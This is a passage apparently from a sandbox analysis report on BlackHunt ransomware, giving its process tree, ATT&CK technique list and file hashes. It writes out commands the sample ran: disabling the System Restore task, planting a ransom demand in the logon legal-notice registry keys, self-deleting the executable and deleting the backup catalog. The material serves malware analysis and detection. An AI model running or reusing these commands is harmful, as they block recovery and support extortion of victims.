- Deletes backup catalog
PID:9180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:8896
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:7520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:7044
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:1764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:9128
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:6268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:812
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:6812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:5164 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:7668
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7668 -s 14444⤵
- Program crash
PID:3272
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\0ec2fc63858d651699c9e5f1793f9548df783e916e72900e9cdd30b853413a6e.exe"2⤵PID:6204
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:5620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:5384
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:7244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:6852
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:2948
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:7232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:6100
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:6212
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4224
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4352
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:6852
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:1056
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 7668 -ip 76681⤵PID:4976
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD50f7e51a2861f188766e724ed6cd12107
SHA19a706cdd045dbc95cf2ce85bb44755646df75da1
SHA256bc87624db0ebf23f09421f5c3fc715f4ec1a14842380ebba9f80d3466fe946e0
SHA5128892d3f0e69b2e6840c2ce968b16c9b2f05af7ebbfccda1dc6677d834ceb75d1cfdbea40d2814f48442395a75fe118ccc7b27f160ffd5a07e068905193159d06
-
Filesize
12KB
MD5b17f70501df6b32b06c86345d9a66b84
SHA1c17385144fd9ecb020f67f13cf11ab03e8f889f4
SHA256c790320c5bd13dd9d7d870a409ace1c405c771ec18afb977bed877a50e01a196
SHA51286540015383bf9d4a6ea2d4a1741cb8ef6702992aa80d2ce2c3ebbf326e50ddf8293a07d76db42be6710b81fcf4207a3d8f9d4a230b9b531be977562bcfc19ba
-
Filesize
684B
MD5d595e1139d2e13c53addd3c5315f221d
SHA10b9b53d5cf1db53f1c4b765bf45c35189b849204
SHA25611fb1e9a358e84d3e3d4fd21e498d654cf55d585f10a91258daa0964c2a017f7
SHA5122e9095ee6b74611c249ce985d05254d0b67000ce2d3216ce516560fe2e63d0a40d5ef2d2e917fdf26d66db521103a5ba6365919208ade6c9d21086b16064c932